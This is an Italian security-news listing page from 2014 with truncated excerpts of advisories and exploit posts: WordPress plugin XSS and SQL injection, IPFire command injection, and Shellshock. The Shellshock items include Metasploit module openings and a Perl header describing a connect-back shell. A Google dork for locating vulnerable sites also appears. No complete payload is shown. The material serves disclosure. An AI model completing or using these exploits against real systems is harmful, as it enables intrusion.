WordPress Photo Gallery Cross-Site Scripting (XSS)

1 ottobre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23232
Product: Photo Gallery WordPress plugin
Vendor: http://web-dorado.com/
Vulnerable Version(s): 1.1.30 and probably prior
Tested Version: 1.1.30
Advisory Publication:  September 10, 2014  [without technical details]
Vendor Notification: September 10, 2014 
Vendor Patch: September 10, 2014 
Public Disclosure: October 1, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-6315
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

WordPress All In One WP Security 3.8.2 SQL Injection

30 settembre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23231
Product: All In One WP Security WordPress plugin
Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy 
Vulnerable Version(s): 3.8.2 and probably prior
Tested Version: 3.8.2
Advisory Publication:  September 3, 2014  [without technical details]
Vendor Notification: September 3, 2014 
Vendor Patch: September 12, 2014 
Public Disclosure: September 24, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-6242
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

WordPress Users Ultra 1.3.37 SQL Injection

30 settembre 2014 - Fonte: http://www.mondounix.com
#################################################################################################
# Title                : Wordpress Users Ultra Plugin - SQL injection Vulnerability
# Risk                 : High+/Critical
# Author               : XroGuE
# Google Dork          : inurl: wp-content/plugins/users-ultra/
# Plugin Version       : 1.3.37
# Plugin Name          : users ultra
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip
# Vendor Home          : http://www.usersultra.com/
# Date                 : 2014/09/27
# Tested in            : Win7 - Linux
##################################################################################################
# Description: 
# This Vulnerability Available...

Leggi il seguito »

WordPress All In One Security And Firewall 3.8.3 XSS

30 settembre 2014 - Fonte: http://www.mondounix.com
Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
 
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325
 
 
Release Date:
=============
2014-09-29
 
 
Vulnerability Laboratory ID (VL-ID):
====================================
1327
 
 
Common Vulnerability Scoring System:
====================================
3.3
 
 
Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a 
security plugin that enforces a lot of good security practices. The All In One...

Leggi il seguito »

IPFire 2.15 Bash Command Injection

30 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
#       It can be maintained via a web interface.
#       The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
#       IPFire is based on Linux From Scratch and is, like the Endian Firewall,...

Leggi il seguito »

DHCP Client Bash Environment Variable Code Injection

29 settembre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/proto/dhcp'
 
class Metasploit3 < Msf::Auxiliary
 
  include Msf::Exploit::Remote::DHCPServer
 
  def initialize
    super(
      'Name'        => 'DHCP Client Bash Environment Variable Code Injection',
      'Description'    => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting dhclient network configuration
        scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.
      },
      'Author'      =>
        [
          'scriptjunkie',...

Leggi il seguito »

Apache mod_cgi Bash Environment Variable Code Injection

29 settembre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
        the HTTP_USER_AGENT variable.
      },
      'Author' => [
        'Stephane...

Leggi il seguito »

Gnu Bash 4.3 CGI Scan Remote Command Injection

29 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
 
# http connection
import urllib2
# Args management
import optparse
# Error managemen
import sys
 
banner = """
      _______                 _______             __
     |   _   .-----.--.--.   |   _   .---.-.-----|  |--.
     |.  |___|     |  |  |   |.  1   |  _  |__ --|     |
     |.  |   |__|__|_____|   |.  _   |___._|_____|__|__|
     |:  1   |               |:  1    \
     |::.. . |               |::.. .  /
     `-------'               `-------'
      ___ ___   _______     _______ _______ ___
     |   Y   | |   _   |   |   _   |   _   |   |
     |   |   |_|___|   |   |.  l   |.  1___|.  |
     |____   |___(__   |   |.  _   |.  |___|.  |
         |:  | |:  1   |   |:  | ...

Leggi il seguito »

bashedCgi Remote Command Execution

29 settembre 2014 - Fonte: http://www.mondounix.com
    require 'msf/core'
 
    class Metasploit3 < Msf::Auxiliary
 
        include Msf::Exploit::Remote::HttpClient
 
 
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'bashedCgi',
                'Description'    => %q{
                   Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. 
                },
                'Author'         => [ 'Stephane Chazelas' ], # vuln discovery 
     'Author'   => [ 'Shaun Colley <scolley at ioactive.com>' ], # metasploit module 
                'License'        => MSF_LICENSE,
...

Leggi il seguito »

Gnu Bash 4.3 CGI REFERER Command Injection

26 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/perl
#
# Title: Bash/cgi command execution exploit
# CVE: CVE-2014-6271
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 25 September 2014
# Published: 26 September 2014
# MorXploit Research
# http://www.MorXploit.com
#
# Description:
# Perl code to exploit CVE-2014-6271.  
# Injects a Perl connect back shell. 
#
# Download:
# http://www.morxploit.com/morxploits/morxbash.pl
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Tested on:
# Apache 2.4.7 / Ubuntu 14.04.1 LTS / Bash 4.3.11(1)-release (x86_64-pc-linux-gnu)
#
#...

Leggi il seguito »